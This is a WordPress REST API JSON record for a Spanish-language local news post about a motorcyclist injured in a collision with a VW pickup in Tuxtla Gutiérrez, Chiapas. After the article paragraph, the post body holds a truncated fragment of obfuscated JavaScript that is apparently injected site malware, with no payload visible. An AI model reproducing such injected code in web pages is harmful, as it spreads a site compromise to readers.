{"id":4428,"date":"2022-08-16T02:56:27","date_gmt":"2022-08-16T02:56:27","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=4428"},"modified":"2022-08-16T02:56:28","modified_gmt":"2022-08-16T02:56:28","slug":"motociclista-resulta-herido-en-accidente-de-transito","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=4428","title":{"rendered":"Motociclista resulta herido en accidente de tr\u00e1nsito"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"576\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/08\/FB_IMG_1660618533028-1024x576.jpg\" alt=\"\" class=\"wp-image-4429\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/08\/FB_IMG_1660618533028-1024x576.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/08\/FB_IMG_1660618533028-300x169.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/08\/FB_IMG_1660618533028-768x432.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/08\/FB_IMG_1660618533028.jpg 1080w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>Jairo Camacho. Agencia ReporteCiudadano, 15 de agosto del 2022. Tuxtla Guti\u00e9rrez. &#8211; Un accidente de tr\u00e1nsito ocurrido en la zona Poniente Norte de Tuxtla dej\u00f3 como salto a un motociclista lesionado.El reporte de tr\u00e1nsito inform\u00f3 que, el conductor de una Yamaha de color blanco YB y una camioneta VW Saveiro circulaban en el Bulevar Vicente Fox a la altura de la Feria Chiapas colisionaron cuando al ir en el carril de Norte  a Sur la camioneta gir\u00f3 en &#8220;U&#8221; provocando corte de circulaci\u00f3n.Por ello el motorista se impact\u00f3 de lleno, y sali\u00f3 proyectado para imapactarse contra el pavimento resultando policontundido.Pese a ello, no fue necesario trasladarlo a un nosocomio.En en lugar se present\u00f3 un ajustador de seguros para mediar en esta situaci\u00f3n y llegar a un acuerdo armonioso.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Jairo Camacho. Agencia ReporteCiudadano, 15 de agosto del 2022. Tuxtla Guti\u00e9rrez. &#8211; Un accidente de tr\u00e1nsito ocurrido en la zona Poniente Norte de Tuxtla dej\u00f3 como salto a un motociclista lesionado.El reporte de tr\u00e1nsito inform\u00f3 que, el conductor de una Yamaha de color blanco YB y una camioneta VW Saveiro circulaban en el Bulevar Vicente &hellip;<\/p>\n","protected":false},"author":2,"featured_media":4429,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[],"class_list":["post-4428","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-roja"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/4428","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=4428"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/4428\/revisions"}],"predecessor-version":[{"id":4430,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/4428\/revisions\/4430"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/4429"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=4428"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=4428"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=4428"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}